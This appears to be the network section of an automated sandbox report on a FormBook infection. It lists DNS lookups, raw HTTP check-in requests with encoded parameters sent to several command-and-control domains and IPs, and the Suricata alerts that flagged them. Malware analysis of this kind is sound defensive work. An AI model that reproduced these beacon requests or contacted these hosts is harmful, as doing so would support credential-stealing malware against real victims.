Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
www.mysticheightstrail.com |
CNAME
mysticheightstrail.com
|
34.102.136.180 |
www.zhperviepixie.com |
CNAME
zhperviepixie.com
|
167.172.228.26 |
www.drpenawaraircondhargarahmah.com | ||
www.gracefullytouchedartistry.com |
CNAME
cdn1.wixdns.net
|
34.149.87.45 |
www.thwmlohr.click | 43.154.67.170 |
- UDP Requests
-
-
192.168.56.101:53004 164.124.101.2:53
-
192.168.56.101:53850 164.124.101.2:53
-
192.168.56.101:54148 164.124.101.2:53
-
192.168.56.101:55146 164.124.101.2:53
-
192.168.56.101:59002 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:54151 239.255.255.250:1900
-
GET
403
http://www.mysticheightstrail.com/sy22/?EDK8gDR=Q5FfiwTKAQAoPcoP4e5kySmJcOUQtYy/n0X88F5fBW8bclPVBZXpMCw8fqRp6JUwXvQoTE+1&BZ=E2M4oNPx_Ln
REQUEST
RESPONSE
BODY
GET /sy22/?EDK8gDR=Q5FfiwTKAQAoPcoP4e5kySmJcOUQtYy/n0X88F5fBW8bclPVBZXpMCw8fqRp6JUwXvQoTE+1&BZ=E2M4oNPx_Ln HTTP/1.1
Host: www.mysticheightstrail.com
Connection: close
HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 07 Sep 2023 22:38:41 GMT
Content-Type: text/html
Content-Length: 291
ETag: "64f0b610-123"
Via: 1.1 google
Connection: close
GET
404
http://www.zhperviepixie.com/sy22/?EDK8gDR=hdFL0kwy0tP2Sq5zkMkXOvLbydzGG5NDjXbLdYDkA/+zwUFtuqh4YP0DuyJcd4UMQHwk1geg&BZ=E2M4oNPx_Ln
REQUEST
RESPONSE
BODY
GET /sy22/?EDK8gDR=hdFL0kwy0tP2Sq5zkMkXOvLbydzGG5NDjXbLdYDkA/+zwUFtuqh4YP0DuyJcd4UMQHwk1geg&BZ=E2M4oNPx_Ln HTTP/1.1
Host: www.zhperviepixie.com
Connection: close
HTTP/1.1 404
Server: nginx/1.20.1
Date: Thu, 07 Sep 2023 22:39:02 GMT
Content-Length: 0
Connection: close
GET
429
http://www.gracefullytouchedartistry.com/sy22/?EDK8gDR=32OyyUZHwqvJixPuiOQtM5MnMYIWhWk0yyAoMHrFdBB4wJvVGBkivZFh4+NGsLP7HahAbSBt&BZ=E2M4oNPx_Ln
REQUEST
RESPONSE
BODY
GET /sy22/?EDK8gDR=32OyyUZHwqvJixPuiOQtM5MnMYIWhWk0yyAoMHrFdBB4wJvVGBkivZFh4+NGsLP7HahAbSBt&BZ=E2M4oNPx_Ln HTTP/1.1
Host: www.gracefullytouchedartistry.com
Connection: close
HTTP/1.1 429 Too Many Requests
Content-Length: 0
Accept-Ranges: bytes
Date: Thu, 07 Sep 2023 22:39:21 GMT
X-Served-By: cache-hnd18739-HND
X-Cache: MISS
X-Seen-By: yvSunuo/8ld62ehjr5B7kA==
Via: 1.1 google
Connection: close
GET
404
http://www.thwmlohr.click/sy22/?EDK8gDR=MgkfgN3fpomwP7fWV5mTPmG15nWdJlegbQggwbe1T0jMd3AI1ruzVKLfVQH9NXyhXYV15IAt&BZ=E2M4oNPx_Ln
REQUEST
RESPONSE
BODY
GET /sy22/?EDK8gDR=MgkfgN3fpomwP7fWV5mTPmG15nWdJlegbQggwbe1T0jMd3AI1ruzVKLfVQH9NXyhXYV15IAt&BZ=E2M4oNPx_Ln HTTP/1.1
Host: www.thwmlohr.click
Connection: close
HTTP/1.1 404 Not Found
Content-Type: text/plain
Date: Thu, 07 Sep 2023 22:39:41 GMT
Content-Length: 18
Connection: close
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49166 -> 34.102.136.180:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.101:49167 -> 167.172.228.26:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.101:49169 -> 43.154.67.170:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.101:49168 -> 34.149.87.45:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts